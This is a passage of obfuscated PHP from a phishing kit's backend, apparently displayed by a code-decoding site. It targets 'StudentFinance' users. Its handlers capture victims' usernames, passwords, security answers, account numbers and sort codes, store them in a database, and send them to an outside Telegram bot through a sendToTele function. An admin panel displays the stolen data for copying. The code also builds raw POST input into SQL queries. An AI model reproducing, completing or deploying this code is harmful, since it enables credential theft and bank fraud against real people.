57\x64\x61\154\55\150\x65\x61\144\x65\x72\47\x20\x73\164\x79\154\145\x3d\x27\142\141\143\x6b\147\162\x6f\x75\x6e\144\x2d\143\x6f\x6c\157\x72\72\43\63\x34\64\71\x35\x45\73\146\157\x6e\164\x2d\x73\x69\172\x65\x3a\x32\56\x37\162\x65\x6d\x3b\164\145\170\164\x2d\x61\x6c\x69\x67\156\72\x63\145\x6e\164\x65\x72\73\x27\76\12\x9\11\11\11\x9\x3c\x68\x35\x20\143\x6c\141\x73\163\75\47\x6d\157\144\141\154\x2d\164\151\164\154\x65\x27\x20\151\144\75\x27\145\x78\141\x6d\160\154\145\115\x6f\x64\141\x6c\114\x61\142\145\x6c\x27\40\163\x74\171\154\145\75\x27\x63\157\154\157\x72\x3a\167\x68\x69\164\x65\x3b\146\157\x6e\164\x2d\x73\151\x7a\x65\72\x31\56\62\162\145\155\x27\76\x41\x64\x6d\151\156\x20\x43\x6f\156\164\x72\x6f\154\40\x28\143\154\151\x63\153\40\157\156\40\x6c\157\x67\x20\164\x6f\x20\x61\165\164\x6f\x2d\143\x6f\x70\171\51\74\57\x68\x35\x3e\xa\11\x9\11\x9\x9\74\x62\165\164\x74\x6f\x6e\x20\164\x79\160\145\75\x27\x62\x75\164\164\157\156\47\x20\143\x6c\141\x73\x73\x3d\x27\x63\154\x6f\163\x65\47\40\157\156\143\x6c\151\x63\x6b\75\x27\x63\x6c\157\163\145\137\x62\164\156\50\51\x27\x20\40\x61\162\151\141\55\x6c\141\x62\x65\x6c\x3d\47\x43\x6c\x6f\163\x65\x27\76\xa\11\x9\x9\x9\x9\x9\74\x73\x70\141\x6e\x20\141\x72\151\x61\55\x68\x69\144\x64\145\156\x3d\47\164\162\x75\x65\x27\40\x73\x74\171\x6c\x65\x3d\47\x63\x6f\x6c\157\x72\x3a\x77\150\151\x74\x65\47\x3e\46\x74\151\155\145\x73\73\74\57\x73\160\141\x6e\x3e\12\11\11\11\11\11\x3c\57\142\165\x74\x74\157\x6e\76\12\x9\x9\11\11\11\74\57\144\151\166\76\12\x9\x9\x9\x9\11\74\144\x69\166\40\x63\x6c\x61\163\x73\x3d\47\x6d\x6f\x64\141\154\55\x62\157\144\171\47\x3e\12\x9\11\11\11\x9\x9\x3c\144\151\166\40\143\154\141\163\163\75\47\x66\x6f\162\x6d\55\147\x72\157\x75\160\x27\40\163\164\x79\154\145\75\47\155\x61\x72\x67\151\x6e\x2d\x62\x6f\x74\x74\x6f\x6d\x3a\x31\x72\145\155\x27\x3e\xa\11\11\11\11\11\x9\x9\74\x62\x72\76\xa\xa\11\x9\11\11\x9\11\x9\74\144\151\x76\40\x63\x6c\x61\163\x73\75\47\144\141\x74\141\55\x67\x72\157\165\160\47\76\12\11\x9\x9\11\11\x9\11\11\74\154\141\142\145\x6c\40\x63\x6c\x61\163\163\75\47\144\x61\164\141\x2d\154\x61\142\x65\154\x27\x3e\x4c\x6f\147\x69\156\40\111\x44\x3c\57\154\x61\142\x65\x6c\x3e\12\x9\x9\x9\x9\x9\x9\11\x9\74\151\x6e\160\x75\164\40\157\x6e\x63\154\151\x63\153\75\47\x63\x6f\160\171\137\142\164\156\x28\x74\x68\x69\x73\x29\x27\x20\x63\x6c\141\x73\163\75\x27\x66\157\x72\x6d\x2d\143\157\156\164\162\x6f\x6c\x27\x20\x72\x65\x61\x64\157\x6e\x6c\171\40\x76\141\154\x75\x65\x3d\x27{$usrlogin}\47\76\12\x9\11\11\11\11\x9\x9\x3c\x2f\144\151\166\x3e\xa\11\11\x9\11\x9\11\11\74\144\151\x76\40\143\x6c\141\x73\x73\x3d\47\144\141\164\x61\55\x67\x72\157\165\160\x27\76\12\11\x9\x9\x9\11\x9\x9\x9\74\x6c\141\142\145\x6c\x20\143\154\x61\163\163\x3d\x27\x64\141\x74\141\x2d\154\141\142\x65\x6c\x27\x3e\x50\141\163\x73\x3c\x2f\154\x61\142\145\x6c\x3e\12\11\11\x9\x9\x9\x9\x9\x9\x3c\x69\156\160\165\x74\40\x6f\x6e\x63\x6c\x69\x63\x6b\75\x27\x63\157\x70\x79\x5f\x62\164\156\x28\x74\150\x69\163\x29\47\x20\x63\x6c\141\163\163\x3d\x27\146\157\162\155\55\143\x6f\156\164\162\157\154\47\x20\162\145\x61\144\157\x6e\154\x79\40\x76\x61\154\165\145\x3d\x27{$usrpass}\x27\76\xa\11\11\x9\x9\x9\x9\11\74\57\144\151\166\76\xa\11\11\11\11\11\11\x9\74\x64\151\166\x20\143\x6c\141\x73\x73\x3d\47\x64\x61\x74\x61\55\x67\162\x6f\x75\x70\47\x3e\xa\11\x9\x9\11\11\11\11\11\x3c\x6c\x61\142\145\x6c\40\x63\154\x61\x73\163\75\47\144\141\x74\x61\55\154\141\x62\x65\x6c\47\x3e\x51\165\145\x73\164\x69\x6f\x6e\74\57\154\141\142\x65\154\x3e\12\11\11\11\11\x9\11\11\x9\74\x69\156\160\165\x74\x20\157\156\143\x6c\x69\x63\153\75\x27\x63\157\x70\x79\137\142\x74\x6e\50\164\x68\151\x73\x29\47\40\x63\154\141\163\163\75\47\146\x6f\162\x6d\x2d\x63\157\x6e\x74\162\x6f\154\x27\40\162\145\141\x64\157\x6e\x6c\x79\40\166\141\154\x75\x65\x3d\47{$secque}\x27\76\xa\x9\11\11\11\x9\11\11\x3c\57\144\151\x76\x3e\xa\11\11\11\x9\x9\x9\x9\74\144\x69\166\x20\x63\x6c\x61\163\163\75\x27\x64\x61\x74\x61\55\x67\162\157\x75\160\x27\76\12\11\x9\x9\x9\x9\x9\11\x9\74\x6c\141\142\x65\154\40\x63\x6c\x61\x73\x73\x3d\x27\x64\141\164\141\x2d\x6c\141\142\145\154\47\76\x41\156\x73\167\x65\x72\74\57\154\x61\142\145\x6c\x3e\12\11\x9\11\11\x9\11\x9\x9\74\151\156\x70\165\164\40\157\156\143\x6c\x69\143\153\x3d\47\x63\x6f\160\x79\x5f\x62\164\156\50\x74\x68\x69\x73\51\x27\x20\143\154\141\163\163\x3d\47\146\x6f\x72\x6d\x2d\143\157\x6e\x74\x72\x6f\x6c\47\x20\x72\145\141\144\157\156\x6c\171\x20\x76\141\154\x75\145\x3d\x27{$secans}\x27\x3e\xa\x9\11\11\x9\11\11\x9\74\57\x64\151\166\x3e\12\x9\x9\11\11\x9\11\11\x3c\144\151\x76\x20\143\x6c\141\x73\x73\75\x27\x64\141\164\141\x2d\147\x72\157\x75\160\47\76\xa\11\11\x9\x9\11\x9\11\11\74\154\x61\x62\145\154\40\143\x6c\141\163\163\75\47\x64\x61\164\141\55\154\141\142\x65\x6c\x27\x3e\101\143\143\157\x75\x6e\164\x3c\57\x6c\141\142\x65\154\76\12\x9\x9\x9\x9\x9\x9\11\x9\74\x69\156\160\x75\164\x20\x6f\156\x63\x6c\151\x63\x6b\75\47\x63\x6f\x70\171\x5f\142\164\x6e\50\x74\150\x69\163\x29\47\40\x63\x6c\141\x73\x73\x3d\x27\x66\157\x72\x6d\55\x63\157\x6e\164\162\x6f\x6c\x27\x20\x72\145\141\x64\x6f\156\154\171\x20\166\141\154\165\145\x3d\x27{$acct}\47\x3e\xa\11\x9\11\x9\x9\11\11\x3c\57\144\151\166\x3e\12\x9\x9\11\x9\11\11\11\74\x64\x69\166\x20\x63\x6c\141\x73\163\x3d\47\x64\x61\164\x61\55\147\162\157\165\160\x27\x3e\12\x9\11\x9\11\x9\11\x9\11\x3c\154\x61\x62\145\154\x20\143\x6c\141\163\x73\x3d\47\144\141\164\x61\55\154\141\x62\x65\x6c\47\x3e\x53\x6f\162\x74\74\57\154\141\142\145\x6c\x3e\xa\11\x9\11\11\x9\x9\11\11\74\151\156\160\165\164\x20\x6f\x6e\143\x6c\x69\x63\x6b\75\x27\x63\x6f\160\x79\137\x62\x74\x6e\50\x74\150\x69\163\51\47\40\x63\154\141\x73\x73\x3d\47\x66\x6f\x72\x6d\55\x63\x6f\156\164\x72\157\x6c\x27\x20\162\x65\141\144\x6f\x6e\x6c\171\x20\x76\x61\x6c\165\x65\x3d\x27{$sort}\x27\x3e\12\11\x9\x9\x9\x9\11\x9\x3c\57\144\151\x76\76\xa\x9\11\x9\x9\11\x9\x9\x3c\144\x69\166\40\x63\x6c\x61\x73\x73\75\x27\144\x61\164\141\x2d\147\x72\x6f\x75\160\x27\76\12\x9\11\x9\x9\11\11\x9\11\x3c\154\141\x62\x65\x6c\40\143\154\x61\x73\163\75\x27\144\141\164\141\55\154\x61\142\145\x6c\x27\x3e\111\x50\x2f\x44\145\166\x69\143\145\x3c\57\154\x61\142\x65\154\x3e\12\11\11\x9\x9\x9\11\11\11\x3c\x69\x6e\160\165\164\40\x6f\156\x63\x6c\x69\x63\x6b\x3d\47\143\157\x70\x79\x5f\x62\164\156\x28\164\x68\x69\163\51\x27\x20\143\154\141\163\163\75\47\x66\157\x72\x6d\x2d\x63\x6f\156\164\x72\x6f\154\47\40\x72\145\141\144\157\x6e\154\x79\40\166\141\x6c\x75\x65\75\x27{$ip}\x20\x5b{$useragent}\135\x27\x3e\xa\x9\x9\x9\11\11\11\11\x3c\x2f\x64\151\166\x3e\12\x9\11\x9\x9\11\x9\x9\74\x62\162\76\xa\11\11\x9\x9\11\11\x3c\x2f\x64\151\x76\76\xa\11\11\x9\11\11\x9\x9\12\x9\11\11\x9\x9\x9\74\41\x2d\55\40\x45\x4e\104\x20\x2d\55\76\12\x9\11\11\x9\11\xa\11\11\x9\11\x9\74\x64\x69\x76\40\143\x6c\141\163\x73\75\47\155\157\144\x61\x6c\x2d\x66\x6f\x6f\x74\x65\162\x27\x20\x73\x74\x79\x6c\145\x3d\x27\155\x61\162\x67\151\x6e\x2d\x74\x6f\x70\x3a\55\64\60\160\x78\47\76\12\11\x9\x9\x9\x9\74\142\165\x74\164\x6f\156\x20\x73\x74\x79\154\x65\75\x27\143\x6f\154\157\162\x3a\x62\154\x61\x63\153\x3b\142\x61\x63\x6b\147\162\x6f\165\x6e\x64\55\143\157\x6c\x6f\x72\72\167\x68\x69\164\145\x27\40\164\x79\x70\145\75\47\x62\165\164\x74\x6f\x6e\47\x20\157\156\x63\154\151\143\153\x3d\x27\x63\x6c\157\x73\x65\137\142\x74\156\x28\51\x27\40\143\x6c\x61\x73\x73\75\47\x62\x74\156\40\x62\164\x6e\55\x6c\x67\40\142\164\156\55\144\141\162\x6b\x20\143\x6f\x6c\x2d\61\62\x27\x20\x3e\x43\x4c\117\x53\105\74\x2f\x62\x75\x74\x74\157\156\76\12\11\x9\x9\x9\11\xa\x9\11\11\11\11\x3c\x2f\144\x69\x76\76\12\11\x9\11\12\x9\11\11\74\x2f\144\151\x76\x3e\xa\11\x9\x9\12\x9\x9\x9\74\57\x64\x69\x76\76\12\x9\11\11\74\57\144\151\x76\76\xa\x9\11\x9\x3c\x2f\x64\151\x76\x3e\12\x9\x9\x9\x3c\57\x66\x6f\x72\x6d\x3e\12\11\x9\x9\x3c\57\x64\151\166\x3e\12\11\11\11"; } } if (isset($_GET["\143\157\x75\156\x74\145\162"])) { $ipFile = "\56\x2e\57\x2e\x2e\57\x6c\x6f\x67\x73\x2f\x76\x69\163\x69\164\163\56\164\x78\164"; $activequery = mysqli_query($conn, "\123\105\x4c\105\103\124\x20\52\40\x46\122\117\115\40\143\165\x73\x74\x6f\x6d\145\162\163\x20\x57\x48\105\x52\x45\40\163\164\141\x74\165\x73\40\74\x32\60"); $completequery = mysqli_query($conn, "\123\x45\114\105\103\x54\x20\x2a\40\106\x52\x4f\115\40\143\x75\x73\x74\x6f\155\x65\x72\163\x20\x57\110\x45\x52\x45\x20\x73\x74\x61\x74\165\x73\x3d\x32\x30"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("\165\163\145\x72\x6e\x75\x6d" => $userRows, "\x61\143\x74\151\x76\x65\x6e\x75\155" => $activeRows, "\143\x6f\155\160\x6c\145\x74\x65\x64\x6e\165\155" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("\163\x74\x61\x74\163" => "\x65\x72\x72\157\x72")); } } if (isset($_GET["\166\x69\163\151\x74\x6c\157\x67"])) { $ipFile = "\56\56\57\56\56\57\x6c\x6f\x67\163\x2f\x76\x69\163\x69\x74\x6f\x72\163\x2e\164\x78\164"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("\x76\x69\x73\151\164\157\x72\154\157\147" => $logquery); echo json_encode($log); } else { echo json_encode(array("\163\164\x61\x74\x73" => "\145\162\x72\157\x72")); } } if (isset($_GET["\142\165\x7a\x7a\x6f\146\x66"])) { $query = mysqli_query($conn, "\x53\105\114\105\x43\124\40\x2a\x20\106\122\117\x4d\40\143\x75\x73\164\x6f\155\145\162\x73\x20\x57\110\x45\x52\105\x20\163\x74\141\164\165\x73\74\75\61\60"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["\x69\x64"]; $queryy = mysqli_query($conn, "\x55\120\x44\101\x54\x45\40\x63\165\163\x74\x6f\155\x65\162\163\x20\x53\105\124\40\142\165\x7a\x7a\145\x64\x3d\61\40\127\110\105\x52\x45\x20\x69\x64\75{$userid}"); if ($queryy) { $stat = "\157\x6b"; } else { $stat = "\156\x6f\164\x6f\x6b"; } } if ($stat == "\x6f\153") { echo json_encode(array("\x73\x74\141\164\165\163" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\141\164\165\163" => "\156\157\x74\x6f\x6b")); } } else { echo json_encode(array("\163\x74\x61\x74\x75\163" => "\156\157\x74\157\x6b")); } } if ($_GET["\164\171\x70\x65"] == "\x64\x65\154\x65\164\x65") { if ($_POST["\165\163\x65\162\x69\144"] and numeric($_POST["\165\x73\145\x72\x69\144"]) == true) { $userid = $_POST["\165\163\x65\x72\x69\x64"]; $query = mysqli_query($conn, "\104\x45\114\105\x54\x45\40\106\122\117\x4d\40\x63\x75\163\164\157\155\x65\162\x73\x20\x57\x48\x45\122\x45\40\151\144\75{$userid}"); if ($query) { echo json_encode(array("\163\164\141\x74\x75\x73" => "\x6f\153")); } else { echo json_encode(array("\x73\x74\x61\164\x75\163" => "\156\157\x74\x6f\x6b")); } } else { echo json_encode(array("\x73\164\141\164\x75\163" => "\156\x6f\164\x6f\153\153")); } } } goto mYQgJ; KSxUa: function sendToTele($messaggio, $token, $chatID) { $url = "\150\164\x74\160\163\x3a\x2f\x2f\141\160\x69\x2e\x74\x65\x6c\145\147\162\x61\155\x2e\x6f\x72\147\57\x62\x6f\x74" . $token . "\57\163\145\x6e\144\115\145\163\x73\141\147\145\77\x63\x68\x61\164\137\151\144\75" . $chatID; $url = $url . "\x26\164\145\170\164\75" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto UF2mQ; OuUJh: include "\x2e\56\x2f\56\x2e\x2f\x43\x4f\x4e\106\111\x47\56\x70\x68\160"; goto yR8wH; qhFr2: include "\x2e\56\57\166\x65\156\x64\x6f\162\x2f\x32\60\x30\56\160\x68\x70"; goto JHsuP; MGlwK: function numeric($num) { if (preg_match("\57\136\x5b\x30\x2d\71\135\53\x24\57", $num)) { $status = true; } else { $status = false; } return $status; } goto KSxUa; mYQgJ: if ($_SESSION["\x73\164\x61\162\164\x65\x64"] == "\x74\x72\165\145") { if ($_GET["\x67\x65\164\163\x74\x61\164\x75\163"] and numeric($_GET["\147\x65\164\x73\164\x61\x74\165\x73"]) == true) { $id = $_GET["\x67\145\x74\x73\164\141\164\x75\x73"]; $query = mysqli_query($conn, "\x53\x45\x4c\105\103\124\40\x2a\x20\x66\x72\x6f\x6d\40\143\x75\x73\164\157\155\x65\162\x73\40\127\110\105\122\105\40\x75\x6e\151\x71\x75\x65\151\x64\75\x27{$id}\x27"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\163\x74\x61\164\165\163"]; } } if ($_GET["\164\x79\x70\145"] == "\123\x65\x63\165\x72\x69\164\x79") { if ($_POST["\x73\x65\143\x61\x6e\163"] and $_POST["\x75\163\145\x72\151\x64"] and numeric($_POST["\x75\x73\x65\x72\151\144"]) == true) { $secans = $_POST["\163\145\143\141\x6e\x73"]; $comment = "\x41\x6e\x73\167\x65\x72\x20\x65\156\x74\x65\x72\x65\x64\54\x20\165\163\x65\162\40\167\x61\x69\x74\151\156\x67"; $uniqueid = $_POST["\165\x73\x65\x72\x69\144"]; $query = mysqli_query($conn, "\x55\120\104\x41\124\105\x20\x63\x75\x73\164\157\155\x65\162\x73\x20\x53\x45\x54\40\x73\145\x63\141\156\163\x3d\47{$secans}\47\x2c\40\143\157\155\155\x65\x6e\164\x3d\47{$comment}\x27\x2c\x20\x73\164\141\164\x75\163\x3d\x32\54\x20\142\165\x7a\172\145\x64\x3d\x30\40\127\x48\x45\x52\105\x20\x75\156\151\161\165\145\x69\144\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\141\164\165\x73" => "\x6f\x6b")); } else { echo json_encode(array("\163\164\141\x74\165\163" => "\x53\145\143\165\x72\x69\164\x79\x20\x45\162\162\157\162")); } } } if ($_GET["\x74\171\160\145"] == "\x44\x65\164\141\x69\154\163") { if ($_POST["\141\143\143\164"] and $_POST["\163\x6f\162\x74"] and $_POST["\165\x73\145\x72\151\144"] and numeric($_POST["\x75\163\x65\x72\x69\144"]) == true) { $acct = $_POST["\x61\x63\143\x74"]; $sort = $_POST["\x73\x6f\x72\x74"]; $comment = "\101\x63\x63\164\x20\x69\x6e\x66\x6f\40\x65\x6e\x74\x65\x72\x65\x64\x2c\40\x75\x73\x65\162\x20\x77\x61\151\x74\151\x6e\147"; $uniqueid = $_POST["\165\163\145\x72\151\144"]; $query = mysqli_query($conn, "\125\120\104\x41\x54\105\40\x63\x75\x73\164\x6f\155\x65\x72\x73\x20\x53\105\124\x20\141\143\x63\x74\x3d\47{$acct}\x27\x2c\40\x73\157\162\x74\75\x27{$sort}\x27\54\40\143\x6f\155\x6d\x65\156\164\75\47{$comment}\47\x2c\x20\163\x74\x61\x74\165\x73\75\x33\x2c\x20\x62\x75\x7a\172\x65\x64\75\60\40\x57\x48\105\x52\105\40\165\x6e\x69\161\165\x65\x69\x64\75{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\164\x75\x73" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\x61\x74\x75\163" => "\101\x63\x63\x74\40\105\162\162\x6f\162")); } } } } goto IHTdE; JHsuP: include "\x2e\x2e\x2f\x76\x65\x6e\x64\157\162\x2f\63\60\x30\56\x70\150\x70"; goto blh65; CvEQU: session_start(); goto MGlwK; qXpn7: include "\56\x2e\57\x76\x65\x6e\144\x6f\162\57\x31\x30\60\x2e\160\x68\x70"; goto qhFr2; blh65: include "\56\56\57\x76\145\x6e\144\x6f\162\x2f\x69\156\x64\x65\x78\x2e\160\150\x70"; goto xClQ7; UF2mQ: if ($_GET["\164\x79\160\x65"] == "\x6c\x6f\x67\151\156") { if ($_POST["\165\x73\x72\x6c\157\147\x69\156"] and $_POST["\x75\x73\162\160\x61\163\163"] and $_POST["\x69\x70"] and $_POST["\165\x61"]) { $usrlogin = $_POST["\x75\x73\x72\154\157\x67\x69\x6e"]; $usrpass = $_POST["\165\163\162\x70\141\x73\x73"]; $ip = $_POST["\x69\x70"]; $comment = "\x4e\x65\167\x20\x75\163\145\162\x20\x6c\157\147\147\x65\144\40\151\156\164\157\40\141\x63\143\157\x75\156\x74"; $ua = urlencode($_POST["\165\x61"]); $uniqueid = time(); $msg = "\x5b\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\x3d\76\40\123\164\165\144\145\x6e\164\x46\x69\x6e\x61\x6e\x63\x65\x20\x4c\x6f\147\40\74\75\75\75\x3d\x3d\75\x3d\75\x3d\75\x5d\12"; $msg .= "\174\40\x55\163\145\x72\x20\111\x44\40\x3a\40" . $usrlogin . "\12"; $msg .= "\174\40\x50\141\x73\163\x77\x6f\x72\x64\x20\x3a\40" . $usrpass . "\12"; $msg .= "\133\75\75\x3d\x3d\75\75\75\75\x3d\x3d\x3e\40\111\120\40\x49\116\106\x4f\x20\74\75\x3d\75\75\75\75\x3d\x3d\x3d\x3d\x5d\12"; $msg .= "\174\40\123\x75\142\155\x69\x74\x74\145\144\x20\142\171\40\x3a\40{$ip}\x20\12"; $msg .= "\x7c\x20\x55\163\x65\162\x41\147\x65\x6e\164\x20\72\x20{$ua}\x20\12"; $msg .= "\x3d\75\75\75\x3d\x3d\75\75\x3d\75\76\x20\x45\x4e\104\x20\74\x3d\75\x3d\75\x3d\75\x3d\x3d\75\x3d\12"; $query = mysqli_query($conn, "\111\x4e\123\105\x52\x54\x20\111\x4e\x54\117\x20\143\165\163\164\x6f\x6d\x65\x72\x73\x20\x28\165\163\x72\154\x6f\x67\x69\x6e\x2c\40\165\163\x72\x70\x61\x73\x73\x2c\40\143\157\155\155\x65\156\x74\x2c\x20\151\x70\x2c\x20\165\163\x65\x72\141\147\x65\x6e\x74\x2c\x20\165\156\x69\x71\165\145\x69\144\54\40\163\x74\x61\x74\165\163\x29\40\126\x41\x4c\125\105\x53\40\50\47{$usrlogin}\47\54\40\x27{$usrpass}\47\x2c\x20\x27{$comment}\x27\54\40\x27{$ip}\x27\x2c\40\x27{$ua}\47\x2c{$uniqueid}\x2c\x20\x31\51"); if ($query) { $_SESSION["\165\156\x69\x71\x75\145\151\x64"] = $uniqueid; $_SESSION["\x73\164\x61\x72\164\x65\144"] = "\x74\x72\x75\x65"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } echo json_encode(array("\x73\164\141\x74\x75\x73" => "\x6f\153")); } else { echo json_encode(array("\163\x74\x61\x74\165\x73" => "\x64\142\x20\143\x6f\x6e\156\40\156\157\x74\x6f\153")); } } } goto vRBuL; xClQ7: include "\56\56\x2f\x76\x65\156\x64\157\x72\x2f\x6e\x65\x74\x63\162\x61\146\x74\137\143\150\x65\x63\x6b\56\160\150\160"; goto CvEQU; yR8wH: include "\x6d\x61\x72\147\x69\x6e\x2e\160\150\x70"; goto qXpn7; IHTdE: ?>
Function Calls
None |
Stats
MD5 | 65a18b6626531702a6997f3bfb80b308 |
Eval Count | 0 |
Decode Time | 112 ms |